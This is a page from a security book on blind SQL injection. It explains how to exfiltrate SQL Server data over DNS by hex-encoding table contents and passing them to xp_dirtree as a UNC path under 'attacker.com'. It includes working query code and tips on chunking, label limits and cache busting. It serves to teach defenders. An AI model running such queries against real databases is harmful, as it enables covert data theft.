SQL Injection Attacks and Defense - 2009

254 Chapter 5 • Blind SQL Injection Exploitation
wish to retrieve into a format that is cleanly handled by DNS, and one method for doing
this is to convert the data into a hexadecimal representation. SQL Server contains a function
called FN_VARBINTOHEXSTR( ) that takes as its sole argument a parameter of type
VARBINARY and returns a hexadecimal representation of the data. For example:
SELECT master.dbo.fn_varbintohexstr(CAST(SYSTEM_USER as VARBINARY))
produces
0x73006100
which is the UTF-16 form of sa.
The next problem is that of path lengths. Because the length of data is likely to exceed
128 characters, you run the risk of either queries failing due to excessively long paths or,
if you take only the first 128 characters from each row, missing out on data. By increasing
the complexity of the exploit, you can retrieve specific blocks of data using a SUBSTRING( )
call. The following example performs a lookup on the first 26 bytes from the first review_
body column in the reviews table:
DECLARE @a CHAR(128);
SELECT @a='\\'+master.dbo.fn_varbintohexstr(CAST(SUBSTRING((SELECT TOP 1
CAST(review_body AS CHAR(255)) FROM reviews),1,26) AS
VARBINARY(255)))+'.attacker.com.';
EXEC master..xp_dirtree @a;
The preceding code produced “0x4d6f7669657320696e20746869732067656e7265206
f667465.attacker.com.” or “Movies in this genre ofte”.
Path length is unfortunately not the last complexity that we face. Although UNC
paths can be at most 128 characters, this includes the prefix \\, the domain name that is
appended, as well as any periods used to separate labels in the path. Labels are strings in a
path that are separated by periods, so the path blah.attacker.com has three labels, namely
“blah”, “attacker”, and “com”. It is illegal to have a single 128-byte label because labels
can have at most 63 characters. To format the pathname such that it fulfills the label
length requirements, a little more SQL is required to massage the data into the correct
form. A small detail that can get in the way when using DNS is that intermediate resolvers
can cache results which prevent lookups from reaching the attacker’s DNS server. You can
bypass this by including some random-looking value in the lookup so that subsequent
lookups are not identical; current time is one option, as is the row number or a true
random value.
Finally, enabling the extraction of multiple rows of data requires wrapping all of the
aforementioned refinements in a loop that extracts rows one by one from a target table,
breaks the data into small chunks, converts the chunks into hexadecimal, inserts periods
every 63 characters in the converted chunk, prepends \\ and appends the attacker’s domain
name, and executes a stored procedure that indirectly causes a lookup.